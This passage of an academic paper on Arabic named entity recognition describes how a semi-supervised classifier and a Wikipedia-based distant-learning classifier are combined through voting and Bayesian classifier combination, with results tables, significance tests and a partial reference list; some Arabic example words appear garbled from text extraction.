classifier (HMM), a robust risk min- imization classifier based on a regularized winnow method (Zhang et al., 2002), and a ME classifier. The features they used included tokens, POS and chunk tags, affixes, gazetteers, and the output of two other NE classifiers trained on richer datasets. Their methods for combining the results of the four NE classifiers improved the overall performance by 17- 21% when compared with the best performing clas- sifier. Saha and Ekbal (2013) studied classifier combi- nation techniques for various NER models under single and multi-objective optimisation frameworks. They used seven diverse classifiers - naive Bayes, decision tree, memory based learner, HMM, ME, CRFs, and SVMs - to build a number of voting mod- els based on identified text features that are selected mostly without domain knowledge. The combina- tion methods used were binary and real vote-based ensembles. They reported that the proposed multi- objective optimisation classifier ensemble with real voting outperforms the individual classifiers, the three baseline ensembles, and the corresponding sin- gle objective classifier ensemble. 3 Two Minimally Supervised NER Classifiers Two main minimally supervised approaches have been used for NER: semi-supervised learning (Al- thobaiti et al., 2013) and distant supervision (Noth- man et al., 2013). We developed state-of-the-art classifiers of both types that will be used as base classifiers in this paper. Our implementations of these classifiers are explained in Section 3.1 and Section 3.2. 3.1 Semi-supervised Learning As previously mentioned, the most common SSL technique is bootstrapping, which only requires a set of seeds to initiate the learning process. We used an algorithm adapted from Althobaiti et al. (2013) and contains three components, as shown in Figure 1. Pattern Induction Instance Extraction Instance Ranking/Selection Seed Instances Figure 1: The Three Components of SSL System. The algorithm begins with a list of a few exam- ples of a given NE type (e.g., ‘London’ and ‘Paris’ can be used as seed examples for location entities) and learns patterns (P) that are used to find more ex- amples (candidate NEs). These examples are even- tually sorted and used again as seed examples for the next iteration. Our algorithm does not use plain frequencies since absolute frequency does not always produce good examples. This is because bad examples will be extracted by one pattern, however unwantedly, as many times as the bad examples appear in the text in relatively similar contexts. Meanwhile, good exam- 245 ples are best extracted using more than one pattern, since they occur in a wider variety of contexts in the text. Instead, our algorithm ranks candidate NEs ac- cording to the number of different patterns that are used to extract them, since pattern variety is a better cue to semantics than absolute frequency (Baroni et al., 2010). After sorting the examples according to the num- ber of distinct patterns, all examples but the top m are discarded, where m is set to the number of ex- amples from the previous iteration, plus one. These m examples will be used in the next iteration, and so on. For example, if we start the algorithm with 20 seed instances, the following iteration will start with 21, and the next one will start with 22, and so on. This procedure is necessary in order to carefully include examples from one iteration to another and to ensure that bad instances are not passed on to the next iteration. The same procedure was applied by (Althobaiti et al., 2013). 3.2 Distant Learning For distant learning we follow the state of the art ap- proach to exploit Wikipedia for Arabic NER, as in (Althobaiti et al., 2014). Our distant learning sys- tem exploits many of Wikipedia’s features, such as anchor texts, redirects, and inter-language links, in order to automatically develop an Arabic NE anno- tated corpus, which is used later to train a state-of- the-art supervised classifier. The three steps of this approach are: 1. Classify Wikipedia articles into a set of NE types. 2. Annotate the Wikipedia text as follows: • Identify and label matching text in the title and the first sentence of each article. • Label linked phrases in the text according to the NE type of the target article. • Compile a list of alternative titles for articles and filter out ambiguous ones. • Identify and label matching phrases in the list and the Wikipedia text. 3. Filter sentences to prevent noisy sentences from being included in the corpus. We briefly explain these steps in the following sec- tions. 3.2.1 Classifying Wikipedia Articles The Wikipedia articles in the dataset need to be classified into the set of named entity types in the classification scheme. We conduct an experiment that uses simple bag-of-words features extracted from different portions of the Wikipedia document and metadata such as categories, the infobox ta- ble, and tokens from the article title and first sen- tence of the document. To improve the accuracy of document classification, tokens are distinguished based on their location in the document. There- fore, categories and infobox features are marked with suffixes to differentiate them from tokens ex- tracted from the article’s body text (Tardif et al., 2009). The feature set is represented by Term Frequency-Inverse Document Frequency (TF-IDF). In order to develop a Wikipedia document classifier to categorise Wikipedia documents into CoNLL NE types, namely person, location, organisation, mis- cellaneous, or other, we use a set of 4,000 manually classified Wikipedia articles that are available free online (Alotaibi and Lee, 2012). 80% of the 4,000 hand-classified Wikipedia articles are used for train- ing, and 20% for evaluation. The Wikipedia docu- ment classifier that we train performs well, achiev- ing an F-score of 90%. The classifier is then used to classify all Wikipedia articles. At the end of this stage, we obtain a list of pairs containing each Wikipedia article and its NE Type in preparation for the next stage: developing the NE-tagged training corpus. 3.2.2 The Annotation Process To begin the Annotation Process we identify matching terms in the article title and the first sen- tence and then tag the matching phrases with the NE-type of the article. The system adopts partial matching where all corresponding words in the ti- tle and the first sentence should first be identified. Then, the system annotates them and all words in between (Althobaiti et al., 2014). The next step is to transform the links between Wikipedia articles into NE annotations according to the NE-type of the link target. Wikipedia also contains a fair amount of NEs without links. We follow the technique proposed by Nothman et al. (2013), which suggests inferring additional links using the aliases for each article. 246 Thus, we compile a list of alternative titles, in- cluding anchor texts and NE redirects (i.e., the linked phrases and redirected pages that refer to NE articles). It is necessary to filter the list, however, to remove noisy alternative titles, which usually appear due to (a) one-word meaningful named entities that are ambiguous when taken out of context and (b) multi-word alternative titles that contain apposition words (e.g., ‘President’, ‘Vice Minister’). To this end we use the filtering algorithm proposed by Althobaiti et al. (2014) (see Algorithm 1). In this algorithm a capitalisation probability measure for Arabic is introduced. This involves finding the English gloss for each one-word alternative name and then computing its probability of being capitalised in the English Wikipedia. In order to find the English gloss for Arabic words, Wikipedia Arabic-to-English cross-lingual links are exploited. In case the English gloss for the Arabic word could not be found using inter-language links, an online translator is used. Before translating the Arabic word, a light stemmer is used to remove prefixes and conjunctions in order to acquire the translation of the word itself without its associated affixes. The capitalisation probability is computed as follows Pr[EN] = f(EN)isCapitalised f(EN)isCapitalised+f(EN)notCapitalised where EN is the English gloss of the alterna- tive name; f(EN)isCapitalised is the number of times the English gloss EN is capitalised in the English Wikipedia; and f(EN)notCapitalised is the number of times the English gloss EN is not capitalised in the English Wikipedia. By specifying a capitalisation threshold constraint, ambiguous one-word titles are prevented from being included in the list of alternative titles. The capitalisation threshold is set to 0.75 as suggested in (Althobaiti et al., 2014). The multi-word alternative name is also omitted if any of its words belong to the list of apposition words. 3.2.3 Building The Corpus The last stage is to incorporate sentences into the final corpus. We refer to this dataset as the Wikipedia-derived corpus (WDC). It contains 165,119 sentences of around 6 million tokens. Our model was then trained on the WDC corpus. In this Algorithm 1: Filtering Alternative Names Input: A set L = {l1, l2, . . . , ln} of all alternative names of Wikipedia articles Output: A set RL = {rl1, rl2, . . . , rln} of reliable alternative names 1 for i ← 1 to n do 2 T ← split li into tokens 3 if (T.size() >= 2) then /* All tokens of T do not belong to apposition list */ 4 if (! containAppositiveWord(T)) then 5 add li to the set RL 6 else 7 lightstem ← findLightStem(li) 8 englishgloss ← translate(lightstem) /* Compute Capitalisation Probability for English gloss */ 9 capprob ← compCapProb(englishgloss) 10 if (capprob > 0.75) then 11 add li to the set RL paper we refer to this model as the DL classifier. The WDC dataset is available online1. We also plan to make the models available to the research community. 4 Classifier Combination 4.1 The Case for Classifier Combination In what follows we use SSL to refer to our semi- supervised classifier (see Section 3.1) and DL to re- fer to our distant learning classifier (see Section 3.2). Table 1 shows the results of both classifiers when tested on the ANERcorp test set (see Section 5 for details about the dataset). NEs Classifiers Precision Recall Fβ=1 PER SSL 85.91 51.10 64.08 DL 80.01 45.11 57.69 LOC SSL 87.91 62.48 73.04 DL 75.21 67.14 70.95 ORG SSL 84.27 40.30 54.52 DL 74.10 57.02 64.45 Overall SSL 86.03 51.29 64.27 DL 76.44 56.42 64.92 Table 1: The results of SSL and DL classifiers on the ANERcorp test set. As is apparent in Table 1, the SSL classifier tends to be more precise at the expense of recall. The dis- 1 https://sites.google.com/site/mahajalthobaiti/resources 247 https://sites.google.com/site/mahajalthobaiti/resources tant learning technique is lower in precision than the semi-supervised learning technique, but higher in re- call. Generally, preference is given to the distant su- pervision classifier in terms of F-score. The classifiers have different strengths. Our semi- supervised algorithm iterates between pattern ex- traction and candidate NEs extraction and selection. Only the candidate NEs that the classifier is most confident of are added at each iteration, which re- sults in the high precision. The SSL classifier per- forms better than distant learning in detecting NEs that appear in reliable/regular patterns. These pat- terns are usually learned easily during the training phase, either because they contain important NE in- dicators2 or because they are supported by many re- liable candidate NEs. For example, the SSL classi- fier has a high probability to successfully detect AÓ AK. ð @ “Obama” and È A g à A ̄ �� ñË “Louis van Gaal” as per- son names in the following sentences: • . . . AJ K A¢� QK. P ð QK ø YË @ AÓ AK. ð @ �� KQË @ h �Qå� “President Obama said on a visit to Britain ...” • . . . à @ YJ ��K A KñK Q�� AÓ H. P YÓ È A g à A ̄ �� ñË È A�̄ “Louis van Gaal the manager of Manchester United said that ...” The patterns extracted from such sentences in the newswire domain are learned easily during the train- ing phase, as they contain good NE indicators like �� KQË @ “president” and H. P YÓ “manager”. Our distant learning method relies on Wikipedia structure and links to automatically create NE anno- tated data. It also depends on Wikipedia features, such as inter-language links and redirects, to handle the rich morphology of Arabic without the need to perform excessive pre-processing steps (e.g., POS- tagging, deep morphological analysis), which has a slight negative effect on the precision of the DL clas- sifier. The recall, however, of the DL classifier is high, covering as many NEs as possible in all pos- sible domains. Therefore, the DL classifier is better than the SSL classifier in detecting NEs that appear in ambiguous contexts (they can be used for differ- ent NE types) and with no obvious clues (NE indi- cators). For example, detecting ø P @Q� ̄ “Ferrari” and AJ »ñ K“Nokia” as organization names in the following sentences: 2 Also known as trigger words which help in identifying NEs within text • . . . ø P @Q� ̄ Ð Qk ø YË @ ,ñ JK P �� K A� úÎ« ñ� �ñË @ Ð Y �®�K “Alonso got ahead of the Renault driver who prevented Ferrari from ... ” • �é �® ®�Ë @ Ð AÖ �ß @ à C« @ áÓ Ð ñK YªK. AJ »ñ K H. A¢ k Z Ag. “Nokia’s speech came a day after the comple- tion of the deal” The strengths and weaknesses of the SSL and DL classifiers indicates that a classifier ensemble could perform better than its individual components. 4.2 Classifier Combination Methods Classifier combination methods are suitable when we need to make the best use of the predictions of multiple classifiers to enable higher accuracy classi- fications. Dietterich (2000a) reviews many methods for constructing ensembles and explains why clas- sifier combination techniques can often gain better performance than any base classifier. Tulyakov et al. (2008) introduce various categories of classifier combinations according to different criteria includ- ing the type of the classifier’s output and the level at which the combinations operate. Several empir- ical and theoretical studies have been conducted to compare ensemble methods such as boosting, ran- domisation, and bagging techniques (Maclin and Opitz, 1997; Dietterich, 2000b; Bauer and Kohavi, 1999). Ghahramani and Kim (2003) explore a gen- eral framework for a Bayesian model combination that explicitly models the relationship between each classifier’s output and the unknown true label. As such, multiclass Bayesian Classifier Combination (BCC) models are developed to combine predictions of multiple classifiers. Their proposed method for BCC in the machine learning context is derived di- rectly from the method proposed in (Haitovsky et al., 2002) for modelling disagreement between human assessors, which in turn is an extension of (Dawid and Skene, 1979). Similar studies for modelling data annotation using a variety of methods are presented in (Carpenter, 2008; Cohn and Specia, 2013). Simp- son et al. (2013) present a variant of BCC in which they consider the use of a principled approximate Bayesian method, variational Bayes (VB), as an in- ference technique instead of using Gibbs Sampling. They also alter the model so as to use point values for hyper-parameters, instead of placing exponential hyper-priors over them. 248 The following sections detail the combination methods used in this paper to combine the minimally supervised classifiers for Arabic NER. 4.2.1 Voting Voting is the most common method in classifier combination because of its simplicity and accept- able results (Van Halteren et al., 2001; Van Erp et al., 2002). Each classifier is allowed to vote for the class of its choice. It is common to take the ma- jority vote, where each base classifier is given one vote and the class with the highest number of votes is chosen. In the case of a tie, when two or more classes receive the same number of votes, a random selection is taken from among the winning classes. It is useful, however, if base classifiers are distin- guished by their quality. For this purpose, weights are used to encode the importance of each base clas- sifier (Van Erp et al., 2002). Equal voting assumes that all classifiers have the same quality (Van Halteren et al., 2001). Weighted voting, on the other hand, gives more weight to classifiers of better quality. So, each classifier is weighted according to its overall precision, or its precision and recall on the class it suggests. Formally, given K classifiers, a widely used com- bination scheme is through the linear interpolation of the classifiers’ class probability distribution as follows P(C |SK1 (w)) = K∑ k=1 Pk (C |Sk (w)) ·λk (w) where Pk(C|Sk(w)) is an estimation of the proba- bility that the correct classification is C given Sk(w), the class for the word w as suggested by classifier k. λk(w) is the weight that specifies the importance given to each classifier k in the combination. Pk(C|Sk(w)) is computed as follows Pk(C|Sk(w)) = { 1, if Sk(w) = C 0, otherwise For equal voting, each classifier should have the same weight (e.g., λk(w) = 1/K). In case of weighted voting, the weight associated with each classifier can be computed from its precision and/or recall as illustrated above. 4.2.2 Independent Bayesian Classifier Combination (IBCC) Using a Bayesian approach to classifier combi- nation (BCC) provides a mathematical combina- tion framework in which many classifiers, with var- ious distributions and training features, can be com- bined to provide more accurate information. This framework explicitly models the relationship be- tween each classifier’s output and the unknown true label (Levenberg et al., 2014). This section de- scribes the Bayesian approach to the classifier com- bination we adopted in this paper which, like the work of Levenberg et al. (2014), is based on Simp- son et al. (2013) simplification of Ghahramani and Kim (2003) model. For ith data point, true label ti is assumed to be generated by a multinomial distribution with the pa- rameter δ: p(ti = j|δ) = δj, which models the class proportions. True labels may take values ti = 1...J, where J is the number of true classes. It is also as- sumed that there are K base classifiers. The output of the classifiers are assumed to be discrete with values l = 1...L, where L is the number of possible out- puts. The output c(k)i of the classifier k is assumed to be generated by a multinomial distribution with parameters π(k)j : p(c (k) i = l|ti = j,π (k) j ) = π (k) j,l where π(k) is the confusion matrix for the classifier k, which quantifies the decision-making abilities of each base classifier. As in Simpson et al. (2013) study, we as- sume that parameters π(k)j and δ have Dirichlet prior distributions with hyper-parameters α(k)0,j = [α (k) 0,j1,α (k) 0,j2, ...,α (k) 0,jL] and ν = [ν0,1,ν0,2, ...,ν0,J ] respectively. Given the observed class labels and based on the above prior, the joint distribution over all variables for the IBCC model is p(δ, Π, t,c|A0,ν) = I∏ i=1 {δti K∏ k=1 π (k) ti,c (k) i }p(δ|ν)p(Π|A), where Π = {π(k)j |j = 1...J,k = 1...K} and A0 = {α(k)0,j |j = 1...J,k = 1...K}. The conditional probability of a test data point ti being assigned class j is given by p(ti = j) = ρij∑J y=1 ρiy , 249 where ρij = δj K∏ k=1 π j,c (k) i . In our implementation we used point values for A0 as in (Simpson et al., 2013). The values of hyper- parameters A0 offered a natural method to include any prior knowledge. Thus, they can be regarded as pseudo-counts of prior observations and they can be chosen to represent any prior level of uncertainty in the confusion matrices, Π. Our inference tech- nique for the unknown variables (δ,π, and t) was Gibbs sampling as in (Ghahramani and Kim, 2003; Simpson et al., 2013). Figure 2 shows the directed graphical model for IBCC. The c(k)i represents ob- served values, circular nodes are variables with dis- tributions and square nodes are variables instantiated with point values. 𝝂𝟎 𝜶𝟎 (𝒌) Classifiers: k=1, 2, …, K Data points: i=1, 2, …, I 𝜹 𝝅(𝒌) 𝒄𝒊 (𝒌) 𝒕𝒊 Figure 2: The directed graph of IBCC. 5 Data In this section, we describe the two datasets we used: • Validation set3(NEWS + BBCNEWS): 90% of this dataset is used to estimate the weight of each base classifier and 10% is used to perform error analysis. • Test set (ANERcorp test set): This dataset is used to evaluate different classifier combina- tion methods. The validation set is composed of two datasets: NEWS and BBCNEWS. The NEWS set contains around 15k tokens collected by Darwish (2013) 3 Also known as development set. from the RSS feed of the Arabic (Egypt) version of news.google.com from October 2012. We created the BBCNEWS corpus by collecting a representa- tive sample of news from BBC in May 2014. It con- tains around 3k tokens and covers different types of news such as politics, economics, and entertainment. The ANERcorp test set makes up 20% of the whole ANERcorp set. The ANERcorp set is a news- wire corpus built and manually tagged especially for the Arabic NER task by Benajiba et al. (2007a) and contains around 150k tokens. This test set is com- monly used in the Arabic NER literature to evaluate supervised classifiers (Benajiba and Rosso, 2008; Abdul-Hamid and Darwish, 2010; Abdallah et al., 2012; Oudah and Shaalan, 2012) and minimally- supervised classifiers (Alotaibi and Lee, 2013; Al- thobaiti et al., 2013; Althobaiti et al., 2014), which allows us to review the performance of the combined classifiers and compare it to the performance of each base classifier. 6 Experimental Analysis 6.1 Experimental Setup In the IBCC model, the validation data was used as known ti to ground the estimates of model param- eters. The hyper-parameters were set as α(k)j = 1 and νj = 1 (Kim and Ghahramani, 2012; Leven- berg et al., 2014). The initial values for random variables were set as follows: (a) the class propor- tion δ was initialised to the result of counting ti and (b) the confusion matrix π was initialised to the re- sult of counting ti and the output of each classifier c(k). Gibbs sampling was run well past stability (i.e., 1000 iterations). Stability was actually reached in approximately 100 iterations. All parameters required in voting methods were specified using the validation set. We examined two different voting methods: equal voting and weighted voting. In the case of equal voting, each classifier was given an equal weight, (1/K) where K was the number of classifiers to be combined. In weighted voting, total precision was used in order to give pref- erence to classifiers with good quality. 250 6.2 Results and Discussion 6.2.1 A Simple Baseline Combined Classifier A proposed combined classifier simply and straightforwardly makes decisions based on the agreed decisions of the base classifiers, namely the SSL classifier and DL classifier. That is, if the base classifiers agree on the NE type of a certain word, then it is annotated by an agreed NE type. In the case of disagreement, the word is considered not named entity. Table 2 shows the results of this combined classifier, which is considered a baseline in this pa- per. Precision Recall Fβ=1 Person 97.31 24.69 39.39 Location 98.35 40.01 56.88 Organisation 97.38 33.2 49.52 Overall 97.68 32.63 48.92 Table 2: The results of the baseline The results of the combined classifier shows very high precision, which indicates that both base clas- sifiers are mostly accurate. The base classifiers also commit different errors that are evident in the low recall. The accuracy and diversity of the single clas- sifiers are the main conditions for a combined clas- sifier to have better accuracy than any of its com- ponents (Dietterich, 2000a). Therefore, in the next section we take into consideration various classifier combination methods in order to aggregate the best decisions of SSL and DL classifiers, and to improve overall performance. 6.2.2 Combined Classifiers: Classifier Combination Methods The SSL and DL classifiers are trained with two different algorithms using different training data. The SSL classifier is trained on ANERcorp training data, while the DL classifier is trained on a corpus automatically derived from Arabic Wikipedia, as ex- plained in Section 3.1 and 3.2. We combine the SSL and DL classifiers using the three classifier combination methods, namely equal voting, weighted voting, and IBCC. Table 3 shows the results of these classifier combination methods. The IBCC scheme outperforms all voting techniques and base classifiers in terms of F-score. Regard- ing precision, voting techniques show the highest scores. However, the high precision is accompanied by a reduction in recall for both voting methods. The IBCC combination method also has relatively high precision compared to the precision of base classi- fiers. Much better recall is registered for IBCC, but it is still low. NEs Combination Methods Precision Recall Fβ=1 PER Equal Voting 79.99 41.88 54.97 Weighted Voting 80.15 44.24 57.01 IBCC 77.87 63.86 70.17 LOC Equal Voting 86.87 30.66 45.32 Weighted Voting 87.48 30.23 44.93 IBCC 81.52 59.86 69.03 ORG Equal Voting 97.01 29.97 45.79 Weighted Voting 98.11 30.98 47.09 IBCC 95.44 34.31 50.47 Overall Equal Voting 87.96 34.17 49.22 Weighted Voting 88.58 35.15 50.33 IBCC 84.94 52.68 65.03 NEs Base Classifiers Precision Recall Fβ=1 Overall SSL 86.03 51.29 64.27 DL 76.44 56.42 64.92 Table 3: The performances of various combination meth- ods. 6.2.3 Combined Classifiers: Restriction of the Combination Process An error analysis of the validation set shows that 10.01% of the NEs were correctly detected by the semi-supervised classifier, but considered not NEs by the distant learning classifier. At the same time, the distant learning classifier managed to correctly detect 25.44% of the NEs that were considered not NEs by the semi-supervised classifier. We also no- ticed that false positive rates, i.e. the possibility of considering a word NE when it is actually not NE, are very low (0.66% and 2.45% for the semi- supervised and distant learning classifiers respec- tively). These low false positive rates and the high percentage of the NEs that are detected and missed by the two classifiers in a mutually exclusive way can be exploited to obtain better results, more specif- ically, to increase recall without negatively affect- ing precision. Therefore, we restricted the combi- 251 nation process to only include situations where the base classifiers agree or disagree on the NE type of a certain word. The combination process is ignored in cases where the base classifiers only disagree on detecting NEs. For example, if the base classifiers disagree on whether a certain word is an NE or not, the word is automatically considered an NE. Figure 3 provides some examples that illustrate the restric- tions we applied to the combination process. The annotations in the examples are based on the CoNLL 2003 annotation guidelines (Chinchor et al., 1999). Predictions of SSL Classifier Predictions of DL Classifier B-PER B-LOC O B-LOC B-ORG O B-PER B-PER Apply Combination Method B-LOC B-ORG Apply Combination Method Figure 3: Examples of restricting the combination pro- cess. Restricting the combination process in this way increases recall without negatively affecting the pre- cision, as seen in Table 4. The increase in recall makes the overall F-score for all combination meth- ods higher than those of base classifiers. This way of using the IBCC model results in a performance level that is superior to all of the individual clas- sifiers and other voting-based combined classifiers. Therefore, the IBCC model leads to a 12% increase in the performance of the best base classifier, while voting methods increase the performance by around 7% - 10%. These results highlight the role of re- stricting the combination, which affects the perfor- mance of combination methods and gives more con- trol over how and when the predictions of base clas- sifiers should be combined. 6.2.4 Comparing Combined Classifiers: Statistical Significance of Results We tested whether the difference in performance between the three classifier combination methods - equal voting, weighted voting, and IBCC - is sig- nificant using two different statistical tests over the results of these combination methods on an ANER- corp test set. The alpha level of 0.01 was used as a significance criterion for all statistical tests. First, We ran a non-parametric sign test. The small p- value (p � 0.01) for each pair of the three combina- NEs Combination Methods Precision Recall Fβ=1 PER Equal Voting 74.46 61.88 67.59 Weighted Voting 77.77 63.50 69.91 IBCC 77.88 64.56 70.60 LOC Equal Voting 74.04 71.36 72.68 Weighted Voting 74.05 73.70 73.86 IBCC 76.20 75.91 76.05 ORG Equal Voting 76.01 63.97 69.47 Weighted Voting 76.30 66.60 71.12 IBCC 78.91 66.65 72.26 Overall Equal Voting 74.84 65.74 69.99 Weighted Voting 76.04 67.93 71.76 IBCC 77.66 69.04 73.10 NEs Base Classifiers Precision Recall Fβ=1 Overall SSL 86.03 51.29 64.27 DL 76.44 56.42 64.92 Table 4: The performances of various combination meth- ods when restricting the combination process. tion methods, as seen in Table 5, suggests that these methods are significantly different. The only com- parison where no significance was found is equal voting vs. weighted voting, when we used them to combine the data without any restrictions (p = 0.3394). Combination Methods (Without Restriction) Equal Voting Weighted Voting IBCC Equal Voting Weighted Voting 0.3394 IBCC <2.2E-16 <2.2E-16 Combination Methods (With Restriction) Equal Voting Weighted Voting IBCC Equal Voting Weighted Voting 1.78E-07 IBCC <2.2E-16 1.97E-06 Table 5: The sign test results (exact p values) for the pair- wise comparisons of the combination methods. Second, we used a bootstrap sampling (Efron and Tibshirani, 1994), which is becoming the de facto standards in NLP (Søgaard et al., 2014). Table 6 compares each pair of the three combination meth- ods using a bootstrap sampling over documents with 10,000 replicates. It shows the p-values and confi- dence intervals of the difference between means. 252 Combination With Restriction Combination Methods Comparison p-value [95% CI] Weighted Voting, Equal Voting 0.000 [0.270, 0.600] IBCC, Equal Voting 0.000 [0.539, 0.896] IBCC, Weighted Voting 0.000 [0.157, 0.426] Combination Without Restriction Combination Methods Comparison p-value [95% CI] Weighted Voting, Equal Voting 0.508 [-0.365, 0.349] IBCC, Equal Voting 0.000 [4.800, 6.122] IBCC, Weighted Voting 0.000 [4.783, 6.130] Table 6: The bootstrap test results (p-values and CI) for the pairwise comparisons of the combination methods. The differences in performance between almost all the three methods of combination are highly sig- nificant. The one exception is the comparison be- tween equal voting and weighted voting, when they are used as a combination method without restric- tion, which shows a non-significant difference (p- value = 0.508, CI = -0.365 to 0.349). Generally, the IBCC scheme performs signifi- cantly better than voting-based combination meth- ods whether we impose restrictions on the combina- tion process or not, as can be seen in Table 3 and Table 4. 7 Conclusion Major advances over the past decade have occurred in Arabic NER with regard to utilising various su- pervised systems, exploring different features, and producing manually annotated corpora that mostly cover the standard set of NE types. More effort and time for additional manual annotations are re- quired when expanding the set of NE types, or ex- porting NE classifiers to new domains. This has mo- tivated research in minimally supervised methods, such as semi-supervised learning and distant learn- ing, but the performance of such methods is lower than that achieved by supervised methods. How- ever, semi-supervised methods and distant learning tend to have different strengths, which suggests that better results may be obtained by combining these methods. Therefore, we trained two classifiers based on distant learning and semi-supervision techniques, and then combined them using a variety of classifier combination schemes. Our main contributions in- clude the following: • We presented a novel approach to Arabic NER using a combination of semi-supervised learning and distant supervision. • We used the Independent Bayesian Classifier Combination (IBCC) scheme for NER, and com- pared it to traditional voting methods. • We introduced the classifier combination restric- tion as a means of controlling how and when the predictions of base classifiers should be com- bined. This research demonstrated that combining the two minimal supervision approaches using various clas- sifier combination methods leads to better results for NER. The use of IBCC improves the performance by 8 percentage points over the best base classi- fier, whereas the improvement in the performance when using voting methods is only 4 to 6 percent- age points. Although all combination methods re- sult in an accurate classification, the IBCC model achieves better recall than other traditional combi- nation methods. Our experiments also showed how restricting the combination process can increase the recall ability of all the combination methods without negatively affecting the precision. The approach we proposed in this paper can be easily adapted to new NE types and different do- mains without the need for human intervention. In addition, there are many ways to restrict the combi- nation process according to the applications’ prefer- ences, either producing high accuracy or recall. For example, we may obtain a highly accurate combined classifier if we do not combine the predictions of all base classifiers for a certain word and automatically consider it not NE when one of the base classifier considers this word not NE. References Sherief Abdallah, Khaled Shaalan, and Muhammad Shoaib. 2012. Integrating rule-based system with classification for arabic named entity recognition. In Computational Linguistics and Intelligent Text Pro- cessing, pages 311–322. Springer. Samir AbdelRahman, Mohamed Elarnaoty, Marwa Magdy, and Aly Fahmy. 2010. Integrated machine 253 learning techniques for arabic named entity recogni- tion. IJCSI, 7:27–36. Ahmed Abdul-Hamid and Kareem Darwish. 2010. Sim- plified feature set for Arabic named entity recognition. In Proceedings of the 2010 Named Entities Workshop, pages 110–115. Association for Computational Lin- guistics. Steven Abney. 2010. Semisupervised learning for com- putational linguistics. CRC Press. Fahd Alotaibi and Mark Lee. 2012. Mapping Ara- bic Wikipedia into the named entities taxonomy. In Proceedings of COLING 2012: Posters, pages 43–52, Mumbai, India, December. The COLING 2012 Orga- nizing Committee. Fahd Alotaibi and Mark Lee. 2013. Automatically De- veloping a Fine-grained Arabic Named Entity Corpus and Gazetteer by utilizing Wikipedia. In IJCNLP. Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio. 2013. A semi-supervised learning approach to arabic named entity recognition. In Proceedings of the Inter- national Conference Recent Advances in Natural Lan- guage Processing RANLP 2013, pages 32–40, Hissar, Bulgaria, September. INCOMA Ltd. Shoumen, BUL- GARIA. Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio. 2014. Automatic Creation of Arabic Named Entity Annotated Corpus Using Wikipedia. In Proceedings of the Student Research Workshop at the 14th Confer- ence of the European Chapter of the Association for Computational Linguistics (EACL), pages 106–115, Gothenburg. Marco Baroni, Brian Murphy, Eduard Barbu, and Mas- simo Poesio. 2010. Strudel: A Corpus-Based Seman- tic Model Based on Properties and Types. Cognitive Science, 34(2):222–254. Eric Bauer and Ron Kohavi. 1999. An empirical comparison of voting classification algorithms: Bag- ging, boosting, and variants. Machine learning, 36(1- 2):105–139. Yassine Benajiba and Paolo Rosso. 2008. Arabic named entity recognition using conditional random fields. In Proc. of Workshop on HLT & NLP within the Arabic World, LREC, volume 8, pages 143–153. Yassine Benajiba, Paolo Rosso, and José Miguel Benedı́ruiz. 2007a. Anersys: An Arabic Named En- tity Recognition System based on Maximum Entropy. In Computational Linguistics and Intelligent Text Pro- cessing, pages 143–153. Springer. Yassine Benajiba, Paolo Rosso, and José Miguel Benedı́ruiz. 2007b. Anersys: An arabic named en- tity recognition system based on maximum entropy. In Computational Linguistics and Intelligent Text Pro- cessing, pages 143–153. Springer. Yassine Benajiba, Mona Diab, Paolo Rosso, et al. 2008. Arabic named entity recognition: An svm-based ap- proach. In Proceedings of 2008 Arab International Conference on Information Technology (ACIT), pages 16–18. Bob Carpenter. 2008. Multilevel bayesian models of categorical data annotation. Unpublished manuscript. Available online at http://lingpipe-blog.com/lingpipe- white-papers/, last accessed 15-March-2015. Nancy Chinchor, Erica Brown, Lisa Ferro, and Patty Robinson. 1999. 1999 Named Entity Recognition Task Definition. MITRE and SAIC. Trevor Cohn and Lucia Specia. 2013. Modelling anno- tator bias with multi-task gaussian processes: An ap- plication to machine translation quality estimation. In ACL, pages 32–42. Kareem Darwish. 2013. Named Entity Recognition us- ing Cross-lingual Resources: Arabic as an Example. In ACL, pages 1558–1567. Alexander Philip Dawid and Allan M Skene. 1979. Max- imum likelihood estimation of observer error-rates us- ing the em algorithm. Applied statistics, pages 20–28. Thomas G. Dietterich. 2000a. Ensemble methods in ma- chine learning. In Multiple Classifier Systems, volume 1857 of Lecture Notes in Computer Science, pages 1– 15. Springer Berlin Heidelberg. Thomas G Dietterich. 2000b. An experimental compar- ison of three methods for constructing ensembles of decision trees: Bagging, boosting, and randomization. Machine learning, 40(2):139–157. Bradley Efron and Robert J Tibshirani. 1994. An intro- duction to the bootstrap. CRC press. Ali Elsebai, Farid Meziane, and Fatma Zohra Belkredim. 2009. A rule based persons names arabic extraction system. Communications of the IBIMA, 11(6):53–59. Radu Florian, Abe Ittycheriah, Hongyan Jing, and Tong Zhang. 2003. Named entity recognition through clas- sifier combination. In Proceedings of the seventh con- ference on Natural language learning at HLT-NAACL 2003-Volume 4, pages 168–171. Association for Com- putational Linguistics. Zoubin Ghahramani and Hyun-Chul Kim. 2003. Bayesian classifier combination. Technical report, University College London. Y Haitovsky, A Smith, and Y Liu. 2002. Modelling dis- agreements among and within raters assessments from the bayesian point of view. In Draft. Presented at the Valencia meeting 2002. Hyun-Chul Kim and Zoubin Ghahramani. 2012. Bayesian classifier combination. In International con- ference on artificial intelligence and statistics, pages 619–627. 254 Abby Levenberg, Stephen Pulman, Karo Moilanen, Ed- win Simpson, and Stephen Roberts. 2014. Predict- ing economic indicators from web text using sentiment composition. International Journal of Computer and Communication Engineering, 3(2):109–115. Richard Maclin and David Opitz. 1997. An empiri- cal evaluation of bagging and boosting. AAAI/IAAI, 1997:546–551. Slim Mesfar. 2007. Named entity recognition for ara- bic using syntactic grammars. In Natural Language Processing and Information Systems, pages 305–316. Springer. Peter Mika, Massimiliano Ciaramita, Hugo Zaragoza, and Jordi Atserias. 2008. Learning to Tag and Tag- ging to Learn: A Case Study on Wikipedia. vol- ume 23, pages 26–33. Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction with- out labeled data. In Proceedings of the Joint Confer- ence of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP: Volume 2 - Volume 2, ACL ’09, pages 1003–1011, Stroudsburg, PA, USA. Association for Computational Linguistics. David Nadeau and Satoshi Sekine. 2007. A survey of named entity recognition and classification. Lingvisti- cae Investigationes, 30(1):3–26. David Nadeau. 2007. Semi-supervised named entity recognition: learning to recognize 100 entity types with little supervision. Truc-Vien T. Nguyen and Alessandro Moschitti. 2011. End-to-end relation extraction using distant supervi- sion 